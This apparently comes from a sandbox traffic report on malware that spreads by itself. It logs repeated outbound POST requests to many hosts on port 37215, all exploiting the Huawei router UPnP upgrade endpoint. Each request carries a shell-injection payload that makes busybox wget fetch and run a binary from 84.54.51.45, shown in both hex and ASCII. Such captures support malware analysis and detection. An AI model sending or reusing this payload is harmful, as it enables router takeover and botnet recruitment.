                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            439192.168.2.1553776197.173.140.18037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783687115 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            440192.168.2.1558208197.55.70.4337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783710003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            441192.168.2.1545520197.145.235.21437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783735037 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            442192.168.2.1549614197.144.81.25437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783752918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            443192.168.2.1548556197.76.29.16537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783776999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            444192.168.2.1539714197.5.98.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783811092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            445192.168.2.1545822197.235.33.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783838034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            446192.168.2.1549656197.24.110.18937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783863068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            447192.168.2.1559256197.113.88.7837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783883095 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            448192.168.2.1543888197.121.95.11237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783911943 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 